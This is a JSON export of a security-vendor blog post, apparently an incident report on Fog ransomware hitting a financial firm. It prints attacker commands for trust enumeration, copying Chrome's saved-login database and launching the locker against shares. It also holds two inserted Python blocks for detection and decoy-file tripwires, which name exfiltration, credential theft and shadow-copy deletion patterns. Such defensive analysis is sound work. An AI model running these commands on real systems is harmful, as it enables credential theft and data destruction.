{"id":70289,"date":"2024-09-05T17:42:25","date_gmt":"2024-09-05T16:42:25","guid":{"rendered":"https:\/\/www.n-able.com\/?p=70289"},"modified":"2026-03-30T16:51:05","modified_gmt":"2026-03-30T15:51:05","slug":"fog-ransomware-now-targeting-the-financial-sector","status":"publish","type":"post","link":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","title":{"rendered":"Fog Ransomware Now Targeting the Financial Sector"},"content":{"rendered":"<p>In early August 2024, threat actors launched a ransomware attack on a mid-sized financial business using compromised VPN credentials. The attackers deployed the ransomware variant known as \u201cFog\u201d against sensitive data on endpoints running both Windows and Linux. The attack was stopped by the Adlumin platform, which plants decoy files on endpoints and treats any attempt to encrypt them as a sensor reading for ransomware activity on the network.<\/p>\n<h2><span>The Fog Ransomware<\/span><\/h2>\n<p><strong><span><a href=\"https:\/\/www.beforecrypt.com\/en\/fog-ransomware\/\" target=\"_blank\" rel=\"noopener\">Fog<\/a><\/span><\/strong> was first observed in May 2024. Its operators do not need a software vulnerability to get in: they log in with compromised VPN credentials, and their early victims were concentrated in the education and recreation sectors. Once inside a network they use techniques such as pass-the-hash to escalate to administrative privileges, which greatly amplifies the damage they can do.<\/p>\n<p>After infiltration, the operators carry out a series of actions designed to cripple the victim\u2019s ability to defend itself and to recover. 
These include disabling security tooling, encrypting critical files (virtual machine disk files, VMDKs, are a favourite target because a single file holds an entire server) and destroying backup data, which leaves victims with little choice but to consider paying. Encrypted files are typically given the extension \u2018.FOG\u2019 or \u2018.FLOCKED\u2019 and are accompanied by a ransom note that directs victims to a negotiation portal on the Tor network.<\/p>\n<p>The lack of attribution to an established ransomware group suggests that Fog is run by a new, capable threat actor.<\/p>\n<h2><span>Network Discovery<\/span><\/h2>\n<p>The attackers began network discovery by pinging other endpoints and writing the results to two text files, \u2018pings.txt\u2019 and \u2018pingw.txt\u2019. They then ran \u2018Advanced_Port_Scanner_2.5.3869(1).exe\u2019 to scan hosts across the network, using the elevated privileges of the compromised service accounts. Both artifacts are worth hunting for: a ping sweep whose output is redirected to a text file, and a port-scanner binary running under a service account, are rarely legitimate.<\/p>\n<h2><span>Lateral Movement<\/span><\/h2>\n<p>The Adlumin team traced the initial access to an unprotected system; the connection came from an IP address in Russia. 
The attackers used two compromised service accounts to move laterally within the network. They first enumerated the domain\u2019s trust relationships with the built-in command:<\/p>\n<hr \/>\n<p><em><strong>nltest \/domain_trusts<\/strong><\/em><\/p>\n<hr \/>\n<p>They then ran a binary named \u2018SharpShares.exe\u2019 to enumerate the network shares reachable from the compromised accounts, which gave them a map of where to move next and what to encrypt.<\/p>\n<h2><span>Credential Harvesting<\/span><\/h2>\n<p>The next step used the Microsoft command-line utility \u2018esentutl.exe\u2019 to copy the Google Chrome \u2018Login Data\u2019 database out of several users\u2019 profiles. This is a living-off-the-land technique: \u2018esentutl \/y &lt;source&gt; \/d &lt;destination&gt;\u2019 simply copies a file, but because it is a signed Microsoft binary the copy rarely draws attention. Chrome protects the saved passwords with Windows DPAPI, so an attacker running in the user\u2019s context, or holding the user\u2019s DPAPI master key, can decrypt them afterwards. The command looked like this, with USERNAME standing for each targeted profile:<\/p>\n<hr \/>\n<p><em><strong>cmd.exe \/Q \/c esentutl.exe \/y \u201cC:\\Users\\USERNAME\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\u201d \/d \u201cC:\\Users\\USERNAME\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp\u201d<\/strong><\/em><\/p>\n<hr \/>\n<h2><span>Execution<\/span><\/h2>\n<p>The threat actor used \u2018Rclone\u2019, an open-source command-line tool for syncing files to cloud storage, to exfiltrate data from the compromised endpoints. The command was filtered to include only files modified within the last two years and to exclude certain file types, keeping the transfer small and focused on data worth extorting over. Rclone is legitimate software, so the signal is not the tool but its context: which account ran it, on which host, and how much data left.<\/p>\n<p>The ransomware itself ran as a tool named \u2018locker.exe\u2019, a name that reflects its role in encrypting, or \u2018locking\u2019, the files. It was pointed directly at network shares (HOSTS and SHAREDRIVE stand for the real host and share names):<\/p>\n<hr \/>\n<p><em><strong>C:\\programdata\\locker.exe -id xCcNKl -nomutex -size 10 -console -target \\\\HOSTS.DOMAIN.COM\\SHAREDRIVE<\/strong><\/em><\/p>\n<hr \/>\n<p>A \u2018readme.txt\u2019 file containing the ransom note was then placed on all infected endpoints. 
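The commands reported above (nltest, SharpShares, esentutl against Chrome's Login Data, Rclone, locker.exe) and the shadow-copy deletion that followed them are individually noisy but collectively unmistakable. What follows is an added example, not code from the original post and not Adlumin's or N-able's detection logic: it shows how a detection engineer might turn this chain into a correlation rule over process-creation telemetry. The events, host names, accounts, paths and timestamps it runs over are constructed for the example; the regular expressions key on the specific arguments reported in this post.

```python
"""
Detection logic for the Fog intrusion chain described in this post.

Added example, not code from the original post and not Adlumin's or
N-able's detection content. It runs over CONSTRUCTED process-creation
events (the fields you would get from Sysmon Event ID 1 or Windows
Security event 4688); host names, accounts, paths and timestamps are
invented for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One rule per stage of the chain, matched case-insensitively against the
# full command line. Each pattern anchors on the tool AND the argument that
# made it malicious here, so routine admin use of nltest or esentutl does
# not fire on its own.
STAGE_RULES = [
    ("discovery_port_scan",   re.compile(r"advanced_port_scanner", re.I)),
    ("discovery_trusts",      re.compile(r"\bnltest(\.exe)?\b.*/domain_trusts", re.I)),
    ("lateral_share_enum",    re.compile(r"\bsharpshares(\.exe)?\b", re.I)),
    ("cred_chrome_logindata", re.compile(r"\besentutl(\.exe)?\b.*\s/y\s.*login data", re.I)),
    ("exfil_rclone",          re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    ("impact_locker",         re.compile(r"\blocker\.exe\b.*-target\s+\\\\", re.I)),
    ("impact_shadow_delete",  re.compile(
        r"vssadmin(\.exe)?\b.*delete shadows"
        r"|wmic(\.exe)?\b.*shadowcopy\s+delete"
        r"|win32_shadowcopy.*\.delete\(\)", re.I)),
]

# Stages that justify an alert on a single event, without waiting for correlation.
CRITICAL_STAGES = {"cred_chrome_logindata", "impact_locker", "impact_shadow_delete"}

def classify(cmdline):
    """Return the set of chain stages whose rule matches one command line."""
    return {name for name, rx in STAGE_RULES if rx.search(cmdline)}

def correlate(events, key="host", window=timedelta(hours=24), min_stages=3):
    """
    Group matched events by host or by account, then slide a time window
    over each group. A group is flagged only when at least `min_stages`
    DISTINCT stages occur inside one window: one nltest or one rclone run
    is admin noise, the sequence is an intrusion. Returns
    {group: [stages in order of first appearance]} for flagged groups.
    """
    field = {"host": 1, "user": 2}[key]
    hits = defaultdict(list)                      # group -> [(time, stage)]
    for ev in events:
        for stage in classify(ev[3]):
            hits[ev[field]].append((datetime.fromisoformat(ev[0]), stage))
    alerts = {}
    for group, seq in hits.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            seen = []
            for t, stage in seq[i:]:
                if t - t0 <= window and stage not in seen:
                    seen.append(stage)
            if len(seen) >= min_stages:
                alerts[group] = seen
                break
    return alerts

def critical_hits(events):
    """Return (timestamp, host, account, stage) for every event in a critical stage."""
    out = []
    for ts, host, user, cmd in events:
        for stage in sorted(classify(cmd) & CRITICAL_STAGES):
            out.append((ts, host, user, stage))
    return out

# Constructed telemetry: (timestamp, host, account, command line).
SAMPLE_EVENTS = [
    ("2024-08-02T01:12:04", "FS01", "CORP\\svc_backup",
     r"cmd.exe /c ping -n 1 10.10.2.15 >> C:\ProgramData\pings.txt"),
    ("2024-08-02T01:20:31", "FS01", "CORP\\svc_backup",
     r"C:\Users\Public\Advanced_Port_Scanner_2.5.3869(1).exe"),
    ("2024-08-02T01:41:10", "FS01", "CORP\\svc_backup", r"nltest.exe /domain_trusts"),
    ("2024-08-02T02:03:55", "FS01", "CORP\\svc_backup", r"C:\ProgramData\SharpShares.exe"),
    ("2024-08-02T02:30:12", "WS07", "CORP\\svc_monitor",
     r'cmd.exe /Q /c esentutl.exe /y "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data" '
     r'/d "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"'),
    ("2024-08-02T03:15:40", "FS01", "CORP\\svc_backup",
     r"rclone.exe copy \\FS01\Finance remote:fin --max-age 2y --exclude *.exe"),
    ("2024-08-02T04:02:08", "FS01", "CORP\\svc_backup",
     r"C:\programdata\locker.exe -id xCcNKl -nomutex -size 10 -console -target \\FS01.corp.local\Finance"),
    ("2024-08-02T04:02:09", "FS01", "CORP\\svc_backup", r"vssadmin.exe delete shadows /all /quiet"),
    # Routine administration that must not be flagged on its own.
    ("2024-08-02T09:00:00", "ADMIN01", "CORP\\it.admin", r"nltest.exe /dclist:corp.local"),
    ("2024-08-02T09:05:00", "ADMIN01", "CORP\\it.admin", r"esentutl.exe /mh C:\Windows\NTDS\ntds.dit"),
]

if __name__ == "__main__":
    for scope in ("host", "user"):
        for group, stages in correlate(SAMPLE_EVENTS, key=scope).items():
            print(f"[{scope}] {group}: {' -> '.join(stages)}")
    for ts, host, user, stage in critical_hits(SAMPLE_EVENTS):
        print(f"[critical] {ts} {host} {user}: {stage}")
```

Run with python3 and it prints one line per flagged host and account plus one line per critical event. The two tiers matter in practice: the correlation threshold keeps a lone nltest or esentutl run by an administrator quiet, while the critical-stage list makes sure that a Chrome credential copy, a locker launch or a shadow-copy wipe is paged on immediately rather than waiting for two more stages to appear.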
Additionally, the attackers used WMIC and PowerShell commands to delete Volume Shadow Copies, removing the local snapshots from which files could otherwise have been restored.<\/p>\n<h2><span>Ransomware Prevention<\/span><\/h2>\n<p>As the attack progressed to the exfiltration phase, the <strong><span>Ransomware Prevention<\/span><\/strong> feature of the <a href=\"https:\/\/www.n-able.com\/products\/adlumin\">Adlumin platform<\/a> automatically isolated the affected machines, locked out the attackers, and prevented data theft. Launched in April 2024, the feature consists of scripts embedded in the Adlumin Security Platform Agent that watch for malicious activity across customers\u2019 networks.<\/p>\n<p>The agent plants decoy files on protected endpoints. No legitimate user or application has a reason to modify a decoy, so a write to one is a high-confidence signal: if ransomware attempts to encrypt a decoy, the scripts immediately run commands that remove the affected device from the network, containing the threat before it spreads further. An alert is sent to the Adlumin platform for investigation.<\/p>\n<p>Ransomware Prevention is a first-of-its-kind patented technology and a significant advance in the fight against ransomware.<\/p>\n<h2><span>Recovery<\/span><\/h2>\n<p>After isolating the targeted endpoints, security engineers examined the systems and found port-scanner binaries, the encryption tool, RMM tools, and other artifacts left by the attackers. 
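Decoy files work because nothing legitimate ever writes to them. The block below is an added example, not Adlumin's or N-able's code, and it makes no claim about how Ransomware Prevention is implemented; it shows the mechanism in miniature: plant decoys, baseline them by size and SHA-256, and on each check report any decoy that was rewritten, renamed or deleted, or any file carrying the '.fog' or '.flocked' extension, handing the findings to an isolation callback. The decoy names, their contents and the simulated locker are invented for the example.

```python
"""
Decoy ("canary") files as ransomware tripwires, in the spirit of the
Ransomware Prevention feature described above.

Added example, not Adlumin's or N-able's code, and no statement about how
that product works internally. It plants decoy files, records a baseline
of size and SHA-256 for each, and on every check reports decoys that were
rewritten, renamed or deleted, plus any file carrying the extensions this
post names (.fog, .flocked). The `isolate` callback stands in for the
network-isolation step; here it only records that it was called. File
names and contents are invented.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# Names chosen to look worth encrypting and, because many lockers walk a
# directory in sorted order, to sort early so they are hit before real data.
DECOY_NAMES = ["00_Board_Minutes_2023.docx", "01_Q3_Forecast.xlsx", "02_passwords_backup.txt"]
RANSOM_EXTENSIONS = {".fog", ".flocked"}

def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def plant_decoys(directory, names=DECOY_NAMES):
    """Create the decoys and return the baseline {name: (size, sha256)}."""
    d = Path(directory)
    d.mkdir(parents=True, exist_ok=True)
    baseline = {}
    for name in names:
        p = d / name
        # Constructed filler; a real deployment would use convincing documents.
        p.write_bytes(("DECOY " + name + "\n").encode() * 64)
        baseline[name] = (p.stat().st_size, _sha256(p))
    return baseline

def check_decoys(directory, baseline, isolate=None):
    """
    Compare the directory with the baseline. Returns (findings, triggered):
      changed    - decoy content differs (encrypted in place)
      missing    - decoy gone or renamed (e.g. name.docx -> name.docx.fog)
      ransom_ext - any file carrying a known ransomware extension
    Nobody has a legitimate reason to touch a decoy, so a single finding is
    enough to call `isolate(findings)`.
    """
    d = Path(directory)
    findings = {"changed": [], "missing": [], "ransom_ext": []}
    for name, (size, digest) in baseline.items():
        p = d / name
        if not p.exists():
            findings["missing"].append(name)
        elif p.stat().st_size != size or _sha256(p) != digest:
            findings["changed"].append(name)
    for p in sorted(d.iterdir()):
        if p.suffix.lower() in RANSOM_EXTENSIONS:
            findings["ransom_ext"].append(p.name)
    triggered = any(findings.values())
    if triggered and isolate is not None:
        isolate(findings)
    return findings, triggered

def simulate_locker(directory, name, rename_ext=None):
    """Stand-in for the locker: overwrite the file with random bytes of the
    same length and, optionally, append an extension. NOT Fog's real routine."""
    p = Path(directory) / name
    p.write_bytes(os.urandom(p.stat().st_size))
    if rename_ext:
        p.rename(p.with_name(p.name + rename_ext))

def demo():
    """Plant decoys, confirm a clean check, run the simulated locker against
    two of them, and check again. Returns what a caller can assert on."""
    isolate_calls = []
    with tempfile.TemporaryDirectory() as tmp:
        baseline = plant_decoys(tmp)
        _, clean_triggered = check_decoys(tmp, baseline, isolate=isolate_calls.append)
        simulate_locker(tmp, "00_Board_Minutes_2023.docx", rename_ext=".fog")
        simulate_locker(tmp, "02_passwords_backup.txt")
        findings, hit_triggered = check_decoys(tmp, baseline, isolate=isolate_calls.append)
    return {
        "clean_triggered": clean_triggered,
        "hit_triggered": hit_triggered,
        "findings": findings,
        "isolate_calls": len(isolate_calls),
    }

if __name__ == "__main__":
    print(demo())
```

In a real agent the check would be driven by file-system change notifications rather than polling, the isolate callback would actually cut the host off (for instance by applying a host firewall rule that permits only the management channel), and the decoys would sit in every share a locker is likely to walk. The hash comparison is not optional: the in-place overwrite in the demo keeps the file size unchanged, so a size-only or mtime-only check would miss it.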
They also identified the unprotected endpoints through which the unauthorized access had come.<\/p>\n<p>The impacted systems were examined, cleaned of attacker tooling and restored to service, and the gaps that allowed the intrusion were closed to reduce the chance of a repeat.<\/p>\n<h2><span>Recommendations<\/span><\/h2>\n<p>We recommend the following measures to protect against Fog ransomware attacks:<\/p>\n<ul>\n<li><strong>Use Multi-Factor Authentication (MFA)<\/strong>: Require MFA on every VPN connection, so that a stolen or leaked password alone is not enough to get in.<\/li>\n<li><strong>Regularly Update and Patch VPN Software<\/strong>: Keep VPN gateways and clients on the latest security patches; edge devices are a favourite entry point and are often patched late.<\/li>\n<li><strong>Monitor VPN Access<\/strong>: Alert on suspicious VPN activity such as logins at unusual hours, from unfamiliar countries, or by accounts that have no business using the VPN at all.<\/li>\n<li><strong>Isolate Affected Endpoints<\/strong>: Put automated isolation in place that triggers when ransomware is detected, and test the isolation path before you need it.<\/li>\n<li><strong>Utilize a Comprehensive Security Platform<\/strong>: Protect endpoints with a platform like the Adlumin Security Operations Platform, which can monitor and respond to threats in real time.<\/li>\n<li><strong>Disable Unnecessary Services<\/strong>: WMIC is deprecated and can be removed from current Windows builds; where PowerShell is required, enable script block and module logging and restrict who may run it, so that commands like the shadow-copy deletion seen in this attack leave evidence and can be alerted on.<\/li>\n<li><strong>Regularly Backup Critical Data<\/strong>: Maintain up-to-date backups stored offline or in an immutable store, and test that they restore. Volume Shadow Copies are not backups; this attacker deleted them as a matter of routine.<\/li>\n<li><strong>Apply the Principle of Least Privilege<\/strong>: Limit administrative privileges, and in particular do not give service accounts broad domain rights: two compromised service accounts carried this entire attack.<\/li>\n<li><strong>Conduct Regular Security Audits<\/strong>: Regularly audit network and endpoint security to identify and fix weaknesses.<\/li>\n<li><strong>Establish Incident Response Plans<\/strong>: Develop and exercise incident response plans for detecting, containing and recovering from ransomware attacks.<\/li>\n<li><strong>Monitor Network 
Traffic<\/strong>: Use advanced threat detection to monitor network traffic for signs of lateral movement or other suspicious activities.<\/li>\n<\/ul>\n<p>Finally, companies should consider adding the Ransomware Prevention service to their network endpoints to prevent ransomware attacks from escalating.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Protect endpoints from ransomware with automated isolation, backups, least privilege, and Adlumin\u2019s platform. Learn key prevention steps and request a demo!<\/p>\n","protected":false},"author":24,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-70289","post","type-post","status-publish","format-standard","hentry","topic-cyber-resilience","topic-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.2 (Yoast SEO v27.2) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Fog Ransomware Now Targeting the Financial Sector - N-able<\/title>\n<meta name=\"description\" content=\"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fog Ransomware Now Targeting the Financial Sector - N-able\" \/>\n<meta property=\"og:description\" content=\"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. 
Learn key prevention steps!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\" \/>\n<meta property=\"og:site_name\" content=\"N-able\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/NableMSP\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-05T16:42:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-30T15:51:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.n-able.com\/wp-content\/uploads\/2025\/08\/2508_Adlumin_BlogHeaders_FogRansomwareNowTargetingtheFinancialSectorAdluminThwartsAttack.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"N-able\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Nable\" \/>\n<meta name=\"twitter:site\" content=\"@Nable\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"N-able\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"5\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\"},\"author\":{\"name\":\"N-able\",\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b\"},\"headline\":\"Fog Ransomware Now Targeting the Financial 
Sector\",\"datePublished\":\"2024-09-05T17:42:25+01:00\",\"dateModified\":\"2026-03-30T15:51:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\"},\"wordCount\":959,\"publisher\":{\"@id\":\"https:\/\/www.n-able.com\/de#organization\"},\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\",\"url\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\",\"name\":\"Fog Ransomware Now Targeting the Financial Sector - N-able\",\"isPartOf\":{\"@id\":\"https:\/\/www.n-able.com\/de#website\"},\"datePublished\":\"2024-09-05T17:42:25+01:00\",\"dateModified\":\"2026-03-30T15:51:05+00:00\",\"description\":\"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!\",\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.n-able.com\/de#website\",\"url\":\"https:\/\/www.n-able.com\/de\",\"name\":\"N-able\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.n-able.com\/de#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.n-able.com\/de?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.n-able.com\/de#organization\",\"name\":\"N-able\",\"url\":\"https:\/\/www.n-able.com\/de\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertica
l-dark.svg\",\"contentUrl\":\"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg\",\"width\":\"1024\",\"height\":\"1024\",\"caption\":\"N-able\"},\"image\":{\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/NableMSP\",\"https:\/\/x.com\/Nable\",\"https:\/\/www.linkedin.com\/company\/n-able\",\"https:\/\/www.youtube.com\/channel\/UClnp77HHg4aME-S-3fWQhFw\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b\",\"name\":\"N-able\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"caption\":\"N-able\"}}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Fog Ransomware Now Targeting the Financial Sector - N-able","description":"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","og_locale":"de_DE","og_type":"article","og_title":"Fog Ransomware Now Targeting the Financial Sector - N-able","og_description":"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. 
Learn key prevention steps!","og_url":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","og_site_name":"N-able","article_publisher":"https:\/\/www.facebook.com\/NableMSP","article_published_time":"2024-09-05T16:42:25+00:00","article_modified_time":"2026-03-30T15:51:05+00:00","og_image":[{"width":1600,"height":900,"url":"https:\/\/www.n-able.com\/wp-content\/uploads\/2025\/08\/2508_Adlumin_BlogHeaders_FogRansomwareNowTargetingtheFinancialSectorAdluminThwartsAttack.png","type":"image\/png"}],"author":"N-able","twitter_card":"summary_large_image","twitter_creator":"@Nable","twitter_site":"@Nable","twitter_misc":{"Verfasst von":"N-able","Gesch\u00e4tzte Lesezeit":"5\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector#article","isPartOf":{"@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector"},"author":{"name":"N-able","@id":"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b"},"headline":"Fog Ransomware Now Targeting the Financial Sector","datePublished":"2024-09-05T17:42:25+01:00","dateModified":"2026-03-30T15:51:05+00:00","mainEntityOfPage":{"@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector"},"wordCount":959,"publisher":{"@id":"https:\/\/www.n-able.com\/de#organization"},"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","url":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","name":"Fog Ransomware Now Targeting the Financial Sector - N-able","isPartOf":{"@id":"https:\/\/www.n-able.com\/de#website"},"datePublished":"2024-09-05T17:42:25+01:00","dateModified":"2026-03-30T15:51:05+00:00","description":"Protect endpoints from ransomware with automated isolation, backups, least 
privilege, and the Adlumin platform. Learn key prevention steps!","inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector"]}]},{"@type":"WebSite","@id":"https:\/\/www.n-able.com\/de#website","url":"https:\/\/www.n-able.com\/de","name":"N-able","description":"","publisher":{"@id":"https:\/\/www.n-able.com\/de#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.n-able.com\/de?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/www.n-able.com\/de#organization","name":"N-able","url":"https:\/\/www.n-able.com\/de","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/","url":"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg","contentUrl":"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg","width":"1024","height":"1024","caption":"N-able"},"image":{"@id":"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/NableMSP","https:\/\/x.com\/Nable","https:\/\/www.linkedin.com\/company\/n-able","https:\/\/www.youtube.com\/channel\/UClnp77HHg4aME-S-3fWQhFw"]},{"@type":"Person","@id":"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b","name":"N-able","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","caption
":"N-able"}}]}},"_links":{"self":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/posts\/70289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/users\/24"}],"replies":[{"embeddable":true,"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/comments?post=70289"}],"version-history":[{"count":0,"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/posts\/70289\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/media?parent=70289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}